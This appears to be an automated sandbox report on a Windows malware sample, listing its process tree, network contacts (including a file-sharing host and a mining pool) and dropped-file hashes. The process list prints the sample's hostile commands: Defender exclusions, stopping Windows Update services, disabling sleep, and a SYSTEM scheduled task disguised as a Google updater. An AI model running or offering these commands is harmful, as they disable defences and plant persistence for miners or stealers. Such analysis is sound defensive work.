PID 1520 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1520 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1520 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1520 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1520 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1520 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1520 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1520 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1520 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\f9a4620f23e2486480307c9a1ac92ee2783f2828bf8e8.exe

"C:\Users\Admin\AppData\Local\Temp\f9a4620f23e2486480307c9a1ac92ee2783f2828bf8e8.exe"

C:\Users\Admin\AppData\Local\Temp\mi.exe

"C:\Users\Admin\AppData\Local\Temp\mi.exe"

C:\Users\Admin\AppData\Local\Temp\cli.exe

"C:\Users\Admin\AppData\Local\Temp\cli.exe"

C:\Windows\Temp\setup.exe

"C:\Windows\Temp\setup.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\cc.exe

"C:\Users\Admin\AppData\Local\Temp\cc.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3020 -s 108

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data19MXG" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data19MXG\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data19MXG" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc8,0xcc,0xd0,0x9c,0xd4,0x7fef65d9758,0x7fef65d9768,0x7fef65d9778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=51512 --headless --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data19MXG" --profile-directory="Default"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --mojo-platform-channel-handle=800 --field-trial-handle=936,i,3073732542164724792,13895836957815719097,131072 --disable-features=PaintHolding /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1224 --field-trial-handle=936,i,3073732542164724792,13895836957815719097,131072 --disable-features=PaintHolding /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --first-renderer-process --remote-debugging-port=51512 --allow-pre-commit-input --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=1564 --field-trial-handle=936,i,3073732542164724792,13895836957815719097,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lwilj#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=51512 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=1856 --field-trial-handle=936,i,3073732542164724792,13895836957815719097,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=51512 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=1984 --field-trial-handle=936,i,3073732542164724792,13895836957815719097,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\system32\taskeng.exe

taskeng.exe {DDDCC8F8-1519-4846-AB89-F44719735610} S-1-5-18:NT AUTHORITY\System:Service:

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=51512 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2508 --field-trial-handle=936,i,3073732542164724792,13895836957815719097,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=51512 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2640 --field-trial-handle=936,i,3073732542164724792,13895836957815719097,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=51512 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=2740 --field-trial-handle=936,i,3073732542164724792,13895836957815719097,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lwilj#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

Network

Country Destination Domain Proto
PL 51.83.170.21:19447 tcp
US 8.8.8.8:53 transfer.sh udp
DE 144.76.136.153:443 transfer.sh tcp
US 8.8.8.8:53 apps.identrust.com udp
US 2.18.121.68:80 apps.identrust.com tcp
US 8.8.8.8:53 youtube.com udp
NL 216.58.214.14:443 youtube.com tcp
N/A 127.0.0.1:51512 tcp
N/A 127.0.0.1:51512 tcp
N/A 127.0.0.1:51512 tcp
N/A 127.0.0.1:51512 tcp
US 8.8.8.8:53 stratum-eu.rplant.xyz udp
FR 141.94.192.217:17056 stratum-eu.rplant.xyz tcp

Files

memory/1356-54-0x0000000000220000-0x0000000000249000-memory.dmp

memory/1356-55-0x0000000000250000-0x000000000028F000-memory.dmp

memory/1356-56-0x0000000000400000-0x00000000018D1000-memory.dmp

memory/1356-57-0x0000000005C20000-0x0000000005C58000-memory.dmp

memory/1356-62-0x0000000005D60000-0x0000000005DA0000-memory.dmp

memory/1356-61-0x0000000005D60000-0x0000000005DA0000-memory.dmp

memory/1356-60-0x00000000019B0000-0x00000000019E4000-memory.dmp

memory/1356-59-0x0000000005D60000-0x0000000005DA0000-memory.dmp

memory/1356-58-0x0000000073E10000-0x00000000744FE000-memory.dmp

memory/1356-63-0x0000000001A00000-0x0000000001A06000-memory.dmp

memory/1356-64-0x0000000005D60000-0x0000000005DA0000-memory.dmp

memory/1356-65-0x0000000000400000-0x00000000018D1000-memory.dmp

memory/1356-66-0x0000000000220000-0x0000000000249000-memory.dmp

memory/1356-67-0x0000000000250000-0x000000000028F000-memory.dmp

memory/1356-68-0x0000000073E10000-0x00000000744FE000-memory.dmp

memory/1356-69-0x0000000005D60000-0x0000000005DA0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabD480.tmp

MD5 3ac860860707baaf32469fa7cc7c0192
SHA1 c33c2acdaba0e6fa41fd2f00f186804722477639
SHA256 d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904
SHA512 d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c

C:\Users\Admin\AppData\Local\Temp\TarD57D.tmp

MD5 4ff65ad929cd9a367680e0e5b1c08166
SHA1 c0af0d4396bd1f15c45f39d3b849ba444233b3a2
SHA256 c8733c93cc5aaf5ca206d06af22ee8dbdec764fb5085019a6a9181feb9dfdee6
SHA512 f530dc0d024a5a3b8903ffaaa41b608a5ccdd6da4ba1949f2c2e55a9fca475fec5c8d2119b5763cabe7ef1c3788fb9dcac621869db51d65b1d83cfe404fb4c27

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c292f6f34a9748a8cdab6a45eee42ab8
SHA1 b37e89091ce26f0740d9295878ec7b79be374b0a
SHA256 1fffe9e74527f7913d677c95d8e7c9f2415226595285f788e8b94a469a01fbdc
SHA512 7da02beb7bdaaa6518274527be851c56d8fe4cb5ef5589cdbb80303115f79e1dae36d323d439834caaea7c751129021bcb93e700c64ed2babc725acd28d2923a

\Users\Admin\AppData\Local\Temp\mi.exe

MD5 aba23d7f60f40f4dee64fa440d5db6e6
SHA1 dde62462dc7887a6b3ba193eafb50da17ef40e67
SHA256 6398817cc923cfad6178c53c6ba9da1f30c426cd183bfdf86889faba8b4732d6
SHA512 ad89270a47e292c931f47da322c055e168b0c4e28de69a20cbf42db9e60fbd59ceb02c01d1c18b1c931d0f23d19230b1c6390d98f36048a3c581b78ffe75ce40

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 aba23d7f60f40f4dee64fa440d5db6e6
SHA1 dde62462dc7887a6b3ba193eafb50da17ef40e67
SHA256 6398817cc923cfad6178c53c6ba9da1f30c426cd183bfdf86889faba8b4732d6
SHA512 ad89270a47e292c931f47da322c055e168b0c4e28de69a20cbf42db9e60fbd59ceb02c01d1c18b1c931d0f23d19230b1c6390d98f36048a3c581b78ffe75ce40

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 aba23d7f60f40f4dee64fa440d5db6e6
SHA1 dde62462dc7887a6b3ba193eafb50da17ef40e67
SHA256 6398817cc923cfad6178c53c6ba9da1f30c426cd183bfdf86889faba8b4732d6
SHA512 ad89270a47e292c931f47da322c055e168b0c4e28de69a20cbf42db9e60fbd59ceb02c01d1c18b1c931d0f23d19230b1c6390d98f36048a3c581b78ffe75ce40

\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

memory/1356-153-0x000000000D0B0000-0x000000000D33B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

C:\Windows\Temp\setup.exe

MD5 bc202c47461acbe8bef80e143eb3a364
SHA1 0ef433c2e54c4097f0ac3dc722fb9e4e7b7c2634
SHA256 df144eec828ac28a99d5d148493b3a4c8f36fce79ea7c41c08511ff69d6762bb
SHA512 3bec158714630e6d38867ddba74eda37e036fa2d31c3b3b83229ab593ee85e36c9964aebb31a847bb5b0e65932d8fcfe0860cb6b2a7a31c10204887daa018e08

\Windows\Temp\setup.exe

MD5 bc202c47461acbe8bef80e143eb3a364
SHA1 0ef433c2e54c4097f0ac3dc722fb9e4e7b7c2634
SHA256 df144eec828ac28a99d5d148493b3a4c8f36fce79ea7c41c08511ff69d6762bb
SHA512 3bec158714630e6d38867ddba74eda37e036fa2d31c3b3b83229ab593ee85e36c9964aebb31a847bb5b0e65932d8fcfe0860cb6b2a7a31c10204887daa018e08

C:\Windows\Temp\setup.exe

MD5 bc202c47461acbe8bef80e143eb3a364
SHA1 0ef433c2e54c4097f0ac3dc722fb9e4e7b7c2634
SHA256 df144eec828ac28a99d5d148493b3a4c8f36fce79ea7c41c08511ff69d6762bb
SHA512 3bec158714630e6d38867ddba74eda37e036fa2d31c3b3b83229ab593ee85e36c9964aebb31a847bb5b0e65932d8fcfe0860cb6b2a7a31c10204887daa018e08

memory/1660-166-0x00000000043D0000-0x0000000005635000-memory.dmp

memory/1012-168-0x0000000076DF0000-0x0000000076F99000-memory.dmp

memory/1012-167-0x000000013F260000-0x00000001404C5000-memory.dmp

memory/1012-170-0x000000013F260000-0x00000001404C5000-memory.dmp

memory/3020-171-0x00000000012A0000-0x000000000152B000-memory.dmp

\Users\Admin\AppData\Local\Temp\cc.exe

MD5 858f82fe9166c34b6709a3adfe6a625f
SHA1 63275e4b77e0fe6fa6f1db716b5963b69b68f8a5
SHA256 8ec2c1bb10e05a5129269488b53a46c6b5be3691c61ef7da7c6eecf1c0444b28
SHA512 1338082ebb6bf658125cd6d72f5885c78865c1abbed50fd10317dacaf41a450eb98b949631f1a1b94a67d335b23cfc0fa78d0d8db3d726adf2a57af50307b89e

memory/1012-172-0x000000013F260000-0x00000001404C5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\cc.exe

MD5 858f82fe9166c34b6709a3adfe6a625f
SHA1 63275e4b77e0fe6fa6f1db716b5963b69b68f8a5
SHA256 8ec2c1bb10e05a5129269488b53a46c6b5be3691c61ef7da7c6eecf1c0444b28
SHA512 1338082ebb6bf658125cd6d72f5885c78865c1abbed50fd10317dacaf41a450eb98b949631f1a1b94a67d335b23cfc0fa78d0d8db3d726adf2a57af50307b89e

memory/2432-181-0x00000000012D0000-0x0000000001904000-memory.dmp

memory/1356-178-0x000000000D0B0000-0x000000000D6E4000-memory.dmp

memory/1012-177-0x000000013F260000-0x00000001404C5000-memory.dmp

memory/2432-183-0x0000000076FE0000-0x0000000076FE2000-memory.dmp

memory/1012-180-0x000000013F260000-0x00000001404C5000-memory.dmp

memory/1356-184-0x0000000000400000-0x00000000018D1000-memory.dmp

memory/1356-186-0x0000000073E10000-0x00000000744FE000-memory.dmp

memory/1012-182-0x000000013F260000-0x00000001404C5000-memory.dmp

memory/2432-185-0x00000000003B0000-0x0000000000420000-memory.dmp

memory/1660-187-0x00000000043D0000-0x0000000005635000-memory.dmp

memory/1012-188-0x0000000076DF0000-0x0000000076F99000-memory.dmp

memory/1012-189-0x000000013F260000-0x00000001404C5000-memory.dmp

memory/2216-191-0x0000000000400000-0x0000000000527000-memory.dmp

memory/2216-201-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/2432-206-0x0000000005D00000-0x0000000005D40000-memory.dmp

memory/2432-207-0x0000000005D00000-0x0000000005D40000-memory.dmp

memory/2432-205-0x0000000005D00000-0x0000000005D40000-memory.dmp

memory/2432-204-0x0000000005D00000-0x0000000005D40000-memory.dmp

memory/2432-203-0x00000000012D0000-0x0000000001904000-memory.dmp

memory/2432-196-0x00000000011A0000-0x000000000120C000-memory.dmp

memory/2432-194-0x0000000073E10000-0x00000000744FE000-memory.dmp

memory/2216-193-0x0000000000400000-0x0000000000527000-memory.dmp

memory/2432-208-0x0000000005680000-0x0000000005732000-memory.dmp

memory/2216-209-0x0000000000400000-0x0000000000527000-memory.dmp

memory/2432-210-0x00000000012D0000-0x0000000001904000-memory.dmp

memory/2216-212-0x0000000000400000-0x0000000000527000-memory.dmp

\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

memory/2216-270-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2216-269-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2216-268-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2216-267-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2216-266-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2216-265-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2216-264-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2216-263-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2216-262-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2216-261-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2216-271-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2216-260-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2216-259-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2216-258-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2216-257-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2216-256-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2216-255-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2216-254-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2216-253-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2216-252-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2216-251-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2216-250-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2216-249-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2216-248-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2216-247-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2216-246-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2216-245-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2216-273-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data19MXG\CrashpadMetrics-active.pma

MD5 03c4f648043a88675a920425d824e1b3
SHA1 b98ce64ab5f7a187d19deb8f24ca4ab5d9720a6d
SHA256 f91dbb7c64b4582f529c968c480d2dce1c8727390482f31e4355a27bb3d9b450
SHA512 2473f21cf8747ec981db18fb42726c767bbcca8dd89fd05ffd2d844206a6e86da672967462ac714e6fb43cc84ac35fffcec7ddc43a9357c1f8ed9d14105e9192

memory/2216-274-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2216-277-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2216-278-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2216-279-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2216-284-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2216-286-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1604-287-0x000000001B1E0000-0x000000001B4C2000-memory.dmp

memory/1604-289-0x0000000002250000-0x0000000002258000-memory.dmp

memory/2216-288-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1012-285-0x000000013F260000-0x00000001404C5000-memory.dmp

memory/2216-290-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2216-291-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data19MXG\Local State

MD5 af4f7d31f78f10c556594aea237a1f69
SHA1 1038b479cfd4c4abf6c1a7ac83dd49ae89ef1e70
SHA256 0dd10c06f1a2bd11de09f66e3e3d2650045dcf0e804752e3f711323b856fb3cb
SHA512 cf2ef879cad057494cc51de70f83f45ee2338f5a99d8af5f1ec5cb1c1e9c226447d94dba3f7d74fe2297a943e7e23ddf5d6368f080b4374e7e593851192cf376

memory/1604-315-0x000000000232B000-0x0000000002392000-memory.dmp

\??\pipe\crashpad_1520_UOHNIHQWZAFVNJOW

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data19MXG\Default\Local Storage\leveldb\MANIFEST-000004

MD5 031d6d1e28fe41a9bdcbd8a21da92df1
SHA1 38cee81cb035a60a23d6e045e5d72116f2a58683
SHA256 b51bc53f3c43a5b800a723623c4e56a836367d6e2787c57d71184df5d24151da
SHA512 e994cd3a8ee3e3cf6304c33df5b7d6cc8207e0c08d568925afa9d46d42f6f1a5bdd7261f0fd1fcdf4df1a173ef4e159ee1de8125e54efee488a1220ce85af904

C:\Users\Admin\AppData\Local\Google\Chrome\User Data19MXG\Default\Local Storage\leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Google\Chrome\User Data19MXG\Default\Local Storage\leveldb\LOG

MD5 2bdf5b8aa2b10b0f0057ee4a8810127c
SHA1 5cb68cf08eee2435532621c25da693e564338341
SHA256 1447a7fb5686dfab83b71b6354f224eb197c2ebb7303f7eb77b837c7d3e50d0e
SHA512 bb40d325b8019a3916e591d39929c7dfb572f2341697ce05298a99e026f93bb6c8418317a3b74c58f67d333aa78ad1ffae424ac19a1613e250584a209d0b7529

C:\Users\Admin\AppData\Local\Google\Chrome\User Data19MXG\Default\Local Storage\leveldb\LOG.old

MD5 aea3493be9be1f3c4592e1b690b9643b
SHA1 e5ebe454038e7cb47581e99d748f06942a031b14
SHA256 cd6b7c1e0025d24859b53eb22280b8cc1c9f8574c213acaf9264d4186cb0d725
SHA512 fd86be87eabd334ffec95cbe8ae3c5d574f99222e512db3f4848bf2d2e733a6ab10149803a0261fa601d769d5cad25f60ab154e07d63f9f24c403038e1e07427

\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

memory/1604-359-0x000007FEF4980000-0x000007FEF531D000-memory.dmp

memory/1604-361-0x0000000002320000-0x00000000023A0000-memory.dmp

memory/2216-363-0x0000000076FEF000-0x0000000076FF0000-memory.dmp

memory/1604-362-0x0000000002324000-0x0000000002327000-memory.dmp

C:\Windows\system32\drivers\etc\hosts

